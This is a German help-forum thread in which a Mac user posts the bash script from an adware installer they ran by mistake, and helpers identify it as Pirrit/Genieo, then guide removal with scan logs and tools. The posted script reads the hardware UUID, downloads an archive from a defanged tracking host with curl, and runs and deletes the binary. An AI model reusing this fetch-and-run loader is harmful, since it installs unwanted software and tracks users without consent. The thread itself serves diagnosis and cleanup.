| |
| |||||||
Alles rund um Mac OSX & Linux: install Whizz script....Windows 7 Für alle Fragen rund um Mac OSX, Linux und andere Unix-Derivate. |
 |
06.02.2017, 18:47
| #1 |
| |  install Whizz script.... Moin, ich aus Versehen in Eile auf eine falsche .pkg geklickt und diese leider ausgeführt. Ich bin mir nun aber relativ sicher, dass dies Ad-Ware ist. Ich habe mir den content mal angeguckt und dieses Scrip hier gefunden: Code:
ATTFilter #!/bin/bash
func_act(){
OS_Version=$(sw_vers -productVersion)
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
if [[ ${OS_Version} == *"10.12"* ]]; then
/usr/bin/curl -s -L -o /var/tmp/act.tgz "hxxp://t.installwizz.com/is/cact?i="8341bec3-888d-46c0-be5d-d9136984a306"&ve=10.12&id=$mid"
else
/usr/bin/curl -s -L -o /var/tmp/act.tgz "hxxp://t.installwizz.com/is/cact?i="8341bec3-888d-46c0-be5d-d9136984a306"&id=$mid"
fi
tar -xzf /var/tmp/act.tgz -C /var/tmp
/var/tmp/act/act "8df60840-f94d-4692-acc3-2c864b7f390d" "8341bec3-888d-46c0-be5d-d9136984a306"
sleep 120
rm -rf /var/tmp/act/act
rm -rf /var/tmp/act.tgz
}
func_act &
Es sind auch noch weitere Sachen in dem .pkg . leider verstehe ich kein bash, weshalb ich Hilfe bräuchte hierbei. Ich würde gerne die Auswirkungen dieser .pkg rückgängig machen. Falls das script unnütz ist, kann ich auch die .pkg hochladen, wüsste aber noch nicht wo oder ob dies hier erlaubt ist im forum. ~applepear |
|
06.02.2017, 23:09
| #2 |
| /// Mac Expert    |  install Whizz script.... Hi,
__________________Diese Seite verbreitet Trojaner in deinem Fall Pirrit und ich würde ein Clean-Install vorschlagen. Du kannst aber erst Malwarebytes durchlaufen lassen: MalwareBytes for Mac
Hinweis für macOS macOS 10.8 Die aktuelle Version von Malwarebytes ist nicht mit macOS 10.8 kompatibel. Bitte dafür folgende Version herunterladen: Malwarebytes 1.2.4.xx  Lesestoff: Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit. Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ |
|
07.02.2017, 13:57
| #3 |
 | install Whizz script.... Die Software ist ziemlich schlecht programmiert. Man braucht in dem Fall kein split innerhalb von awk. Leider fehlt mir ein richtiges Beispiel um den Code zu testen. Falls der Programmierer mitliest hier ein Verbesserungsvorschlag.
__________________alt: Code:
ATTFilter mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
Code:
ATTFilter mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F\" '/IOPlatformUUID/ {printf("%s\n", $4)}')
Code:
ATTFilter mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F\" '/IOPlatformUUID/ {print $4}')
|
|
07.02.2017, 14:26
| #4 |
| /// Winkelfunktion /// TB-Süch-Tiger™  | install Whizz script.... Ich weiß jetzt nicht genau, wie so eine typische Ausgabe von ioreg ist, aber mit mit dem {print $4} weist man awk ja an, nur das vierte Feld auszugeben. Das ergibt nur Sinn wenn da eine tabellenähnliche Ausgabe mit festen Breiten ist....vllt möchte man besser cut (und grep) verwenden? Oder machts das gleiche? Code:
ATTFilter mid=$(ioreg -rd1 -c IOPlatformExpertDevice | grep IOPlatformUUID | cut -d" -f4)
__________________ Logfiles bitte immer in CODE-Tags posten  |
|
08.02.2017, 11:35
| #5 |
| | install Whizz script.... Entscheidend ist der von mir eingefügte awk - Delimiter / Trennzeichen " Code:
ATTFilter -d"
|
|
08.02.2017, 11:43
| #6 | |
| /// Winkelfunktion /// TB-Süch-Tiger™ | install Whizz script.... ah  wofür braucht man denn überhaupt noch cut und grep wenn awk eh alles kann  Was wäre denn effizienter? awk alles machen lassen oder zwei Spezialtools zu verketten? Die UNIX Philosophie sagt ja eigentlich aus, dass ein Tool nur eine Aufgabe machen, diese aber perfekt beherrschen soll. Das spräche doch eher für grep und dann mit cut verkettet oder?  ok, schon was dazu gefunden => http://unix.stackexchange.com/questi...-cut-with-grep Zitat:
__________________ --> install Whizz script.... Geändert von cosinus (08.02.2017 um 11:49 Uhr) |
|
19.02.2017, 16:23
| #7 |
| | install Whizz script....Code:
ATTFilter Malwarebytes Anti-Malware 1.2.6.730 system report - 19. Februar 2017 um 16:17:31 MEZ Mac OS X version Version 10.12.3 (Build 16D32) System uptime: 0d 03:21:18 Helper tool version: 1.2.6.730 Signatures version: 168 Safari extensions ----------------------- xxxxxxxxxx xxxxxxxxxx Name: AdBlock Path: /Users/xxxxxxxxxx/Library/Safari/Extensions/AdBlock.safariextz Modified: 2017-02-09 11:07:19 +0000 Name: Ultimate Status Bar Path: /Users/xxxxxxxxxx/Library/Safari/Extensions/Ultimate Status Bar.safariextz Modified: 2015-01-24 12:58:43 +0000 Chrome extensions ----------------------- xxxxxxxxxx Default Name: Google Slides Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/aapocclcgogkmnckokdopfmhonfmgoek Modified: 2015-06-07 14:02:16 +0000 Name: Google Docs Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/aohghmighlieiainnegkcijnfilokake Modified: 2015-06-07 14:02:21 +0000 Name: Google Drive Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/apdfllckaahabafndbhieahigkjlhalf Modified: 2015-12-06 15:37:44 +0000 Name: YouTube Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/blpcfgokakmgnkcojhhkbfbldkacnbeo Modified: 2015-10-04 16:08:15 +0000 Name: Google Search Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/coobgpohoikkiipiblmjeljniedjpjpf Modified: 2015-12-06 15:37:45 +0000 Name: Google Sheets Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/felcaaldnbdncclmgdcncolpebgiejap Modified: 2015-06-07 14:02:18 +0000 Name: Google Docs Offline Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/ghbmnnjooekpmoecnnnilnnbdlolhkhi Modified: 2016-04-22 18:41:30 +0000 Name: Chrome Web Store Payments Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/nmmhkkegccagdldgiimedpiccmgmieda Modified: 2017-02-02 18:58:17 +0000 Name: Gmail Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/pjkljhegncpnkpknbcohdijeoejaedia Modified: 2015-06-07 14:02:21 +0000 Name: Chrome Media Router Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/pkedcjkdefgpdelpbcmbmeomcjbeemfm Modified: 2017-02-19 12:20:44 +0000 Name: Path: /Users/xxxxxxxxxx/Library/Application Support/Google/Chrome/Default/Extensions/Temp Modified: 2017-02-19 12:20:44 +0000 Firefox extensions ----------------------- xxxxxxxxxx expe6vlb.default Name: iGetter Extension Path: /Users/xxxxxxxxxx/Library/Application Support/Firefox/Profiles/expe6vlb.default/extensions/igetterextension@presenta.net Modified: 2014-05-03 15:50:57 +0000 Name: Video Converter Path: /Users/xxxxxxxxxx/Library/Application Support/Firefox/Profiles/expe6vlb.default/extensions/{1C177B10-F72F-11E1-A21F-0800200C9A66}.xpi Modified: 2013-02-01 10:15:36 +0000 User Login Items ----------------------- User: xxxxxxxxxx Name: GrowlHelperApp Path: /Incompatible Software/Growl.prefPane/Contents/Resources/GrowlHelperApp.app Name: Hotspot Shield Path: (null) Name: 3DconnexionHelper Path: /Library/PreferencePanes/3Dconnexion.prefPane/Contents/Resources/3DconnexionHelper.app Name: Spotify Path: /Applications/Spotify.app System startup items ----------------------- User launch agents ----------------------- /Users/xxxxxxxxxx/Library/LaunchAgents/.dat.nosync01bc.4D4rqR /Users/xxxxxxxxxx/Library/LaunchAgents/com.bittorrent.uTorrent.plist /Users/xxxxxxxxxx/Library/LaunchAgents/com.google.keystone.agent.plist /Users/xxxxxxxxxx/Library/LaunchAgents/com.spotify.webhelper.plist /Users/xxxxxxxxxx/Library/LaunchAgents/com.valvesoftware.steamclean.plist /Users/xxxxxxxxxx/Library/LaunchAgents/org.virtualbox.vboxwebsrv.plist System launch agents ----------------------- /Library/LaunchAgents/at.obdev.LittleSnitchUIAgent.plist /Library/LaunchAgents/com.adobe.ARMDCHelper.cc24aef4a1b90ed56a725c38014c95072f92651fb65e1bf9c8e43c37a23d420d.plist /Library/LaunchAgents/com.avira.antivirus.general.agent.plist /Library/LaunchAgents/com.avira.antivirus.gjallarhorn.plist /Library/LaunchAgents/com.avira.antivirus.notifications.agent.plist /Library/LaunchAgents/com.avira.antivirus.odscan.default.plist /Library/LaunchAgents/com.avira.antivirus.scheduler.agent.plist /Library/LaunchAgents/com.avira.antivirus.systray.plist /Library/LaunchAgents/com.avira.antivirus.telemetry.agent.plist /Library/LaunchAgents/com.avira.antivirus.update.default.plist /Library/LaunchAgents/com.avira.helper.avstats.plist /Library/LaunchAgents/com.fsecure.freedome.gui.plist /Library/LaunchAgents/com.Logitech.Control Center.Daemon.plist /Library/LaunchAgents/com.realvnc.vncserver.peruser.plist /Library/LaunchAgents/com.realvnc.vncserver.prelogin.plist /Library/LaunchAgents/org.freedesktop.dbus-session.plist /Library/LaunchAgents/org.gpgtools.gpgmail.enable-bundles.plist /Library/LaunchAgents/org.gpgtools.gpgmail.patch-uuid-user.plist /Library/LaunchAgents/org.gpgtools.Libmacgpg.xpc.plist /Library/LaunchAgents/org.gpgtools.macgpg2.fix.plist /Library/LaunchAgents/org.gpgtools.macgpg2.shutdown-gpg-agent.plist /Library/LaunchAgents/org.gpgtools.updater.plist /Library/LaunchAgents/org.macosforge.xquartz.startx.plist System launch daemons ----------------------- /Library/LaunchDaemons/at.obdev.littlesnitchd.plist /Library/LaunchDaemons/com.adobe.ARMDC.Communicator.plist /Library/LaunchDaemons/com.adobe.ARMDC.SMJobBlessHelper.plist /Library/LaunchDaemons/com.adobe.fpsaud.plist /Library/LaunchDaemons/com.anchorfree.ajaxserver.plist /Library/LaunchDaemons/com.avira.antivirus.dbcleaner.plist /Library/LaunchDaemons/com.avira.helper.watchdox.plist /Library/LaunchDaemons/com.bombich.ccc.plist /Library/LaunchDaemons/com.cyberghostsrl.CyberghostPrivilegedHelper.plist /Library/LaunchDaemons/com.fsecure.freedome.uninstall.plist /Library/LaunchDaemons/com.fsecure.freedome.vpn.plist /Library/LaunchDaemons/com.malwarebytes.HelperTool.plist /Library/LaunchDaemons/com.microsoft.office.licensing.helper.plist /Library/LaunchDaemons/com.realvnc.vncserver.plist /Library/LaunchDaemons/org.freedesktop.dbus-system.plist /Library/LaunchDaemons/org.gpgtools.gpgmail.patch-uuid.plist /Library/LaunchDaemons/org.macosforge.xquartz.privileged_startx.plist /Library/LaunchDaemons/org.wireshark.ChmodBPF.plist /Library/LaunchDaemons/org.wireshark.XQuartzFixer.plist Kernel extensions ----------------------- /System/Library/Extensions/3Dconnexion.kext /System/Library/Extensions/3Dconnexion.kext/Contents/PlugIns/ConnexionVirtual.kext /System/Library/Extensions/DesktopStreamerDisplay.kext /System/Library/Extensions/hp_fax_io.kext /System/Library/Extensions/hp_Photosmart_io_enabler.kext /System/Library/Extensions/JMicronATA.kext /System/Library/Extensions/LogitechUnifying.kext /System/Library/Extensions/PS3Enabler.kext /System/Library/Extensions/ScreenRecyclerDriver.kext /System/Library/Extensions/usb.kext /Library/Extensions/3Dconnexion.kext /Library/Extensions/3Dconnexion.kext/Contents/PlugIns/ConnexionVirtual.kext /Library/Extensions/ACS6x.kext /Library/Extensions/ArcMSR.kext /Library/Extensions/ATTOCelerityFC8.kext /Library/Extensions/ATTOExpressSASHBA2.kext /Library/Extensions/ATTOExpressSASRAID2.kext /Library/Extensions/CalDigitHDProDrv.kext /Library/Extensions/FileAccessControl.kext /Library/Extensions/HighPointIOP.kext /Library/Extensions/HighPointRR.kext /Library/Extensions/hp_io_enabler_compound.kext /Library/Extensions/LittleSnitch.kext /Library/Extensions/LogitechHIDDevices.kext /Library/Extensions/LogitechUnifying.kext /Library/Extensions/PromiseSTEX.kext /Library/Extensions/SoftRAID.kext launchd.conf contents ----------------------- Hosts file ----------------------- 127.0.0.1 activate.adobe.com 127.0.0.1 practivate.adobe.com 127.0.0.1 ereg.adobe.com 127.0.0.1 activate.wip3.adobe.com 127.0.0.1 wip3.adobe.com 127.0.0.1 3dns-3.adobe.com 127.0.0.1 3dns-2.adobe.com 127.0.0.1 adobe-dns.adobe.com 127.0.0.1 adobe-dns-2.adobe.com 127.0.0.1 adobe-dns-3.adobe.com 127.0.0.1 ereg.wip3.adobe.com 127.0.0.1 activate-sea.adobe.com 127.0.0.1 wwis-dubc1-vip60.adobe.com 127.0.0.1 activate-sjc0.adobe.com 127.0.0.1 adobe.activate.com 127.0.0.1 209.34.83.73:443 127.0.0.1 209.34.83.73:43 127.0.0.1 209.34.83.73 127.0.0.1 209.34.83.67:443 127.0.0.1 209.34.83.67:43 127.0.0.1 209.34.83.67 127.0.0.1 ood.opsource.net 127.0.0.1 CRL.VERISIGN.NET 127.0.0.1 199.7.52.190:80 127.0.0.1 199.7.52.190 127.0.0.1 adobeereg.com 127.0.0.1 OCSP.SPO1.VERISIGN.COM 127.0.0.1 199.7.54.72:80 127.0.0.1 199.7.54.72## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost fe80::1%lo0 localhost Scan log ----------------------- 2017-02-06 23:38:45 : 2017-02-06 23:38:45 : ----- Scan Started ----- 2017-02-06 23:38:46 : Scanning with signatures version 147 (2016-12-2) 2017-02-06 23:39:24 : OSX.Genieo : /Library/LaunchAgents/com.genieo.engine.plist 2017-02-06 23:39:25 : OSX.Genieo : /Users/admin/Library/Application Support/Genieo 2017-02-06 23:39:25 : Adware.Vidx/MacVX : /Users/xxxxxxxxxx/Library/Application Support/Firefox/Profiles/expe6vlb.default/extensions/een@yueuuoa.org 2017-02-06 23:39:34 : *** Scan time: 0d 00:00:48 *** 2017-02-06 23:39:34 : ------ Scan Ended ------ 2017-02-06 23:39:52 : Removing detected threats... 2017-02-06 23:39:52 : Removing Item: /Library/LaunchAgents/com.genieo.engine.plist 2017-02-06 23:39:52 : Removing Item: /Users/admin/Library/Application Support/Genieo 2017-02-06 23:39:52 : Removing Extension Item: /Users/xxxxxxxxxx/Library/Application Support/Firefox/Profiles/expe6vlb.default/extensions/een@yueuuoa.org 2017-02-06 23:39:52 : ---- Threat Removal Complete ---- 2017-02-06 23:40:33 : ===== Attempting restart ===== |
|
19.02.2017, 18:12
| #8 | |
| /// Mac Expert | install Whizz script.... Hi, Genio aka VSearch, Pirit wurde entfernt aber Teile sind noch vorhanden. Du hast dir keinen gefallen getan in dem du jetzt quer durch das AV-Aquarium alles was du finden konntest installiert hast  Schritt 1 1. Entferne Avira mit dieser Anleitung 2. Entferne F-Secure in dem du das Deinstallationstool verwendest. 3. Was das ist konnte ich leider nicht herausfinden: Zitat:
Füge anschliessend die URL mit dem Ergebnis hier ein. EtreCheck installieren
__________________ ----------------- -Gruß dante12 ----------------- Lob, Kritik, Wünsche?  Spende fürs trojaner-board? |
|
19.02.2017, 19:33
| #9 |
| | install Whizz script.... Die Datei ist 0Bytes groß... deshalb kann ich sie nicht hochladen. Wird wohl nichts drin sein oder gibts anderweitig da Schlupflöcher? hier ist das Ergebnis von EtreCheck: Code:
ATTFilter EtreCheck version: 3.1.5 (343)
Report generated 2017-02-19 18:56:25
Download EtreCheck from https://etrecheck.com
Runtime 5:43
Performance: Below Average
Click the [Support] links for help with non-Apple products.
Click the [Details] links for more information about that line.
Click the [Remove] links to remove adware.
Problem: No problem - just checking
Hardware Information: ⓘ
MacBook Pro (13-inch, Mid 2012)
[Technical Specifications] - [User Guide] - [Warranty & Service]
MacBook Pro - model: MacBookPro9,2
1 2,9 GHz Intel Core i7 (i7-3520M) CPU: 2-core
8 GB RAM Upgradeable - [Instructions]
BANK 0/DIMM0
4 GB DDR3 1600 MHz ok
BANK 1/DIMM0
4 GB DDR3 1600 MHz ok
Bluetooth: Good - Handoff/Airdrop2 supported
Wireless: en1: 802.11 a/b/g/n
Battery: Health = Check Battery - Cycle count = 291
Video Information: ⓘ
Intel HD Graphics 4000
Color LCD 1280 x 800
SMT22A300 1920 x 1080
System Software: ⓘ
macOS Sierra 10.12.3 (16D32) - Time since boot: about 5 hours
Disk Information: ⓘ
APPLE HDD HTS541010A9E682 disk0 : (1 TB) (Rotational)
[Show SMART report]
EFI (disk0s1) <not mounted> : 210 MB
Recovery HD (disk0s3) <not mounted> [Recovery]: 650 MB
disk0s4 (disk0s4) <not mounted> : 50.00 GB
Macintosh HD (disk1) / [Startup]: 918.98 GB (35.93 GB free)
Encrypted AES-XTS Unlocked
Core Storage: disk0s2 919.35 GB Online
HL-DT-ST DVDRW GS31N ()
USB Information: ⓘ
Apple Inc. Apple Internal Keyboard / Trackpad
Apple Computer, Inc. IR Receiver
Apple Inc. BRCM20702 Hub
Apple Inc. Bluetooth USB Host Controller
Apple Inc. FaceTime HD Camera (Built-in)
Logitech USB Receiver
Thunderbolt Information: ⓘ
Apple Inc. thunderbolt_bus
Configuration files: ⓘ
/etc/hosts - Count: 29
Gatekeeper: ⓘ
Mac App Store and identified developers
Adware: ⓘ
~/Library/LaunchAgents/com.bittorrent.uTorrent.plist
One adware file found. [Remove]
Unknown Files: ⓘ
~/Library/LaunchAgents/phantomStartup.plist
/Applications/Avira Phantom VPN.app/Contents/MacOS/PhantomVPN --hidden
One unknown file found. [Check files]
Kernel Extensions: ⓘ
/Library/Application Support/Hotspot Shield
[not loaded] com.anchorfree.tun (1.1.1 - SDK 10.8 - 2016-01-05) [Support]
/Library/Application Support/VirtualBox
[loaded] org.virtualbox.kext.VBoxDrv (5.1.0 - 2016-07-16) [Support]
[loaded] org.virtualbox.kext.VBoxNetAdp (5.1.0 - 2016-07-16) [Support]
[loaded] org.virtualbox.kext.VBoxNetFlt (5.1.0 - 2016-07-16) [Support]
[loaded] org.virtualbox.kext.VBoxUSB (5.1.0 - 2016-07-16) [Support]
/Library/Extensions
[loaded] at.obdev.nke.LittleSnitch (3.7 - SDK 10.11 - 2017-02-06) [Support]
[loaded] com.Logitech.Control Center.HID Driver (3.9.1 - SDK 10.8 - 2017-02-06) [Support]
[loaded] com.avira.kext.FileAccessControl (1.2.5 - SDK 10.9 - 2017-02-06) [Support]
/System/Library/Extensions
[loaded] com.3dconnexion.driver (10.0.13 - SDK 10.6 - 2017-02-06) [Support]
[loaded] com.Logitech.Unifying.HID Driver (1.3.0 - SDK 10.8 - 2017-02-06) [Support]
[not loaded] com.mice.driver.PS3Controller (1.0.0d1 - 2017-02-06) [Support]
[not loaded] com.screenrecycler.driver.ScreenRecyclerDriver (1.4.13 - SDK 10.4 - 2017-02-06) [Support]
[loaded] info.ennowelbers.framebuffer (1.0 - SDK 10.2 - 2017-02-06) [Support]
[not loaded] wch.usb.usb (1.1.1 - SDK 10.6 - 2017-02-06) [Support]
/System/Library/Extensions/3Dconnexion.kext/Contents/PlugIns
[not loaded] com.3dconnexion.virtual.driver (10.0.13 - 2013-07-12) [Support]
System Launch Agents: ⓘ
[not loaded] 8 Apple tasks
[loaded] 166 Apple tasks
[running] 106 Apple tasks
System Launch Daemons: ⓘ
[not loaded] 34 Apple tasks
[loaded] 170 Apple tasks
[running] 108 Apple tasks
Launch Agents: ⓘ
[running] at.obdev.LittleSnitchUIAgent.plist (2016-11-30) [Support]
[running] com.Logitech.Control Center.Daemon.plist (2015-10-04) [Support]
[failed] com.adobe.ARMDCHelper.cc24aef4a1b90ed56a725c38014c95072f92651fb65e1bf9c8e43c37a23d420d.plist (2017-01-11) [Support]
[loaded] com.avira.antivirus.general.agent.plist (2017-02-19) [Support]
[loaded] com.avira.antivirus.gjallarhorn.plist (2017-02-06) [Support]
[loaded] com.avira.antivirus.notifications.agent.plist (2017-02-19) [Support]
[loaded] com.avira.antivirus.odscan.default.plist (2017-02-19) [Support]
[loaded] com.avira.antivirus.scheduler.agent.plist (2017-02-19) [Support]
[running] com.avira.antivirus.systray.plist (2017-02-19) [Support]
[loaded] com.avira.antivirus.telemetry.agent.plist (2017-02-19) [Support]
[loaded] com.avira.antivirus.update.default.plist (2017-02-19) [Support]
[running] com.avira.helper.avstats.plist (2017-02-06) [Support]
[running] com.fsecure.freedome.gui.plist (2016-10-18) [Support]
[loaded] com.oracle.java.Java-Updater.plist (2016-12-12) [Support]
[loaded] com.realvnc.vncserver.peruser.plist (2014-08-23) [Support]
[not loaded] com.realvnc.vncserver.prelogin.plist (2014-08-23) [Support]
[not loaded] org.freedesktop.dbus-session.plist [Support]
[loaded] org.gpgtools.Libmacgpg.xpc.plist (2016-10-14) [Support]
[loaded] org.gpgtools.gpgmail.enable-bundles.plist (2015-09-21) [Support]
[loaded] org.gpgtools.gpgmail.patch-uuid-user.plist (2015-09-21) [Support]
[loaded] org.gpgtools.macgpg2.fix.plist (2016-10-14) [Support]
[running] org.gpgtools.macgpg2.shutdown-gpg-agent.plist (2016-10-14) [Support]
[loaded] org.gpgtools.updater.plist (2016-11-05) [Support]
[loaded] org.macosforge.xquartz.startx.plist (2016-05-05) [Support]
Launch Daemons: ⓘ
[running] at.obdev.littlesnitchd.plist (2016-11-30) [Support]
[loaded] com.adobe.ARMDC.Communicator.plist (2017-01-11) [Support]
[loaded] com.adobe.ARMDC.SMJobBlessHelper.plist (2017-01-11) [Support]
[loaded] com.adobe.fpsaud.plist (2017-01-30) [Support]
[loaded] com.anchorfree.ajaxserver.plist (2013-11-08) [Support]
[loaded] com.avira.antivirus.dbcleaner.plist (2017-02-19) [Support]
[running] com.avira.helper.watchdox.plist (2017-02-19) [Support]
[loaded] com.bombich.ccc.plist (2014-05-24) [Support]
[loaded] com.cyberghostsrl.CyberghostPrivilegedHelper.plist (2015-06-15) [Support]
[loaded] com.fsecure.freedome.uninstall.plist (2016-10-18) [Support]
[loaded] com.fsecure.freedome.vpn.plist (2016-10-18) [Support]
[running] com.malwarebytes.HelperTool.plist (2017-02-06) [Support]
[loaded] com.microsoft.office.licensing.helper.plist (2010-08-31) [Support]
[loaded] com.oracle.java.Helper-Tool.plist (2016-09-23) [Support]
[loaded] com.realvnc.vncserver.plist (2014-06-03) [Support]
[running] openvpn.plist (2017-02-19) [Support]
[not loaded] org.freedesktop.dbus-system.plist [Support]
[loaded] org.gpgtools.gpgmail.patch-uuid.plist (2015-09-21) [Support]
[loaded] org.macosforge.xquartz.privileged_startx.plist (2016-05-05) [Support]
[not loaded] org.virtualbox.startup.plist (2016-07-16) [Support]
[loaded] org.wireshark.ChmodBPF.plist (2015-09-09) [Support] - /Library/Application Support/Wireshark/ChmodBPF/ChmodBPF: Executable not found!
[loaded] org.wireshark.XQuartzFixer.plist (2015-09-09) [Support] - /Library/Application Support/Wireshark/XQuartzFixer/XQuartzFixer: Executable not found!
[running] phantomDaemon.plist (2017-02-19) [Support]
User Launch Agents: ⓘ
[loaded] com.bittorrent.uTorrent.plist (2016-12-10) Adware! [Remove]
/usr/bin/open
[loaded] com.google.keystone.agent.plist (2017-01-14) [Support]
[running] com.spotify.webhelper.plist (2017-02-19) [Support]
[loaded] com.valvesoftware.steamclean.plist (2016-08-31) [Support]
[not loaded] org.virtualbox.vboxwebsrv.plist (2016-07-16) [Support]
[not loaded] phantomStartup.plist (2017-02-19) [Support]
User Login Items: ⓘ
GrowlHelperApp Programm
(/Incompatible Software/Growl.prefPane/Contents/Resources/GrowlHelperApp.app)
3DconnexionHelper Programm
(/Library/PreferencePanes/3Dconnexion.prefPane/Contents/Resources/3DconnexionHelper.app)
Spotify Programm Hidden
(/Applications/Spotify.app)
Internet Plug-ins: ⓘ
nppanda3d: Unknown (2012-02-13) [Support]
Unity Web Player: UnityPlayer version 4.3.0f4 - SDK 10.6 (2013-12-23) [Support]
Flip4Mac WMV Plugin: 2.3.8.1 (2011-01-14) [Support]
AdobePDFViewerNPAPI: 15.023.20056 - SDK 10.11 (2017-01-21) [Support]
FlashPlayer-10.6: 24.0.0.221 - SDK 10.9 (2017-02-19) [Support]
Silverlight: 5.1.50428.0 - SDK 10.6 (2016-07-21) [Support]
QuickTime Plugin: 7.7.3 (2017-01-08)
Flash Player: 24.0.0.221 - SDK 10.9 (2017-02-19) [Support]
iPhotoPhotocast: 7.0 - SDK 10.7 (2012-12-30)
SharePointBrowserPlugin: 14.0.0 (2010-09-01) [Support]
AdobePDFViewer: 15.023.20056 - SDK 10.11 (2017-01-21) [Support]
JavaAppletPlugin: Java 8 Update 111 build 14 (2016-12-12) Check version
User internet Plug-ins: ⓘ
BlueStacks Install Detector: Unknown
Picasa: 1.0 - SDK 10.6 (2014-01-08) [Support]
iGetterScriptablePlugin: 2.9.2 (2014-05-03) [Support]
Google Earth Web Plug-in: 7.1 (2013-10-07) [Support]
Safari Extensions: ⓘ
AdBlock - BetaFish, Inc. - https://getadblock.com (2017-02-09)
Ultimate Status Bar - Karl Dearden - hxxp://ultimatestatusbar.com/ (2015-01-24)
3rd Party Preference Panes: ⓘ
3Dconnexion (2016-02-14) [Support]
Flash Player (2017-01-30) [Support]
Flip4Mac WMV (2011-01-13) [Support]
GamePadCompanionPrefPanel (2013-10-14) [Support]
GPGPreferences (2016-10-14) [Support]
Java (2016-12-12) [Support]
Logitech Control Center (2015-10-04) [Support]
Paragon NTFS for Mac ® OS X (2014-12-31) [Support]
Perian (2010-03-18) [Support]
TeXDistPrefPane (2015-08-24) [Support]
Web Sharing (2013-01-26) [Support]
Time Machine: ⓘ
Skip System Files: NO
Mobile backups: ON
Auto backup: YES
Volumes being backed up:
Macintosh HD: Disk size: 918.98 GB Disk used: 883.05 GB
Destinations:
Toshiba Backup [Local]
Total size: 1.52 TB
Total number of backups: 81
Oldest backup: 22.09.14, 17:06
Last backup: 20.01.17, 18:36
Size of backup disk: Too small
Backup size 1.52 TB < (Disk used 883.05 GB X 3)
Top Processes by CPU: ⓘ
5% WindowServer
3% com.apple.WebKit.Plugin.64
2% kernel_task
0% hidd
0% avguard-ondemand-mgmt
Top Processes by Memory: ⓘ
858 MB kernel_task
418 MB slic3r
418 MB Safari
238 MB Spotify Helper(2)
229 MB Arduino
Virtual Memory Information: ⓘ
2.62 GB Available RAM
509 MB Free RAM
5.38 GB Used RAM
2.13 GB Cached files
8 MB Swap Used
Diagnostics Information: ⓘ
Feb 19, 2017, 01:33:52 PM /Library/Logs/DiagnosticReports/PrinterProxy_2017-02-19-133352_[redacted].hang
/Users/[redacted]/Library/Printers/Photosmart C4500 series.app/Contents/MacOS/PrinterProxy
Feb 19, 2017, 12:56:12 PM Self test - passed
|
|
19.02.2017, 21:20
| #10 | |
| /// Mac Expert | install Whizz script....Zitat:
__________________ ----------------- -Gruß dante12 ----------------- Lob, Kritik, Wünsche? Spende fürs trojaner-board? |
|
20.02.2017, 07:10
| #11 |
| | install Whizz script.... Also Avira würde ich schon gerne behalten, ebenso fsecure von welchem ich aber nur den VPN Service nutze. |
|
20.02.2017, 17:09
| #12 |
| /// Mac Expert | install Whizz script.... Ich zwinge niemanden meine Vorstellungen auf wenn du diese behalten möchtest ist das OK für mich. wie läuft der Rechner jetzt?
__________________ ----------------- -Gruß dante12 ----------------- Lob, Kritik, Wünsche? Spende fürs trojaner-board? |
|
22.02.2017, 19:17
| #13 |
| | install Whizz script.... Läuft wieder ohne Probleme^^ Danke ���� |
|
25.02.2017, 21:31
| #14 |
| /// Mac Expert | install Whizz script.... gern geschehenDu kannst die Tools die wir verwendet haben jetzt entfernen wenn du möchtest. Malwarebytes deinstallieren
Code:
ATTFilter ~/Library/Preferences/com.malwarebytes.antimalware.plist ~/Library/Application Support/com.malwarebytes.antimalware ~/Library/Application Support/Malwarebytes ~/Library/Application Support/ Malwarebytes Anti-Malware ~/Library/Caches/com.malwarebytes.antimalware ~/Library/Caches/com.malwarebytes.Malwarebytes-XPC-Service ~/Library/Saved Application State/com.malwarebytes.antimalware.savedState Nachfolgend wird das Admin-Passwort benötigt! /Library/LaunchDaemons/com.malwarebytes.HelperTool.plist /Library/PrivilegedHelperTools/com.malwarebytes.HelperTool /private/var/folders/g_/l2b0cm_s2_gbcpxgx0fxw7m40000gn/C/com.malwarebytes.antimalware /private/var/db/BootCaches/7AA62581-9456-44A7-AD96-EBFA077787A1/app.com.malwarebytes.antimalware.playlist Du kannst jetzt die EtreCheck.app wieder deinstallieren wenn du es nich mehr nutzen willst.
Code:
ATTFilter ~/Library/Application Support
Code:
ATTFilter ~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments
Code:
ATTFilter ~/Library/Caches/
Code:
ATTFilter ~/Library/Preferences/
__________________ ----------------- -Gruß dante12 ----------------- Lob, Kritik, Wünsche? Spende fürs trojaner-board? |
|
| Themen zu install Whizz script.... |
| .ins, ad-ware, auswirkungen, bräuchte, content, device, erlaubt, falsche, gefunde, geklickt, gen, hilfe, hochladen, install, installwizz, nicht, osx adware, relativ, rückgängig, sache, sachen, script, unnütz, version, virus, würde, wüsste |
install Whizz script....
Linear-Darstellung
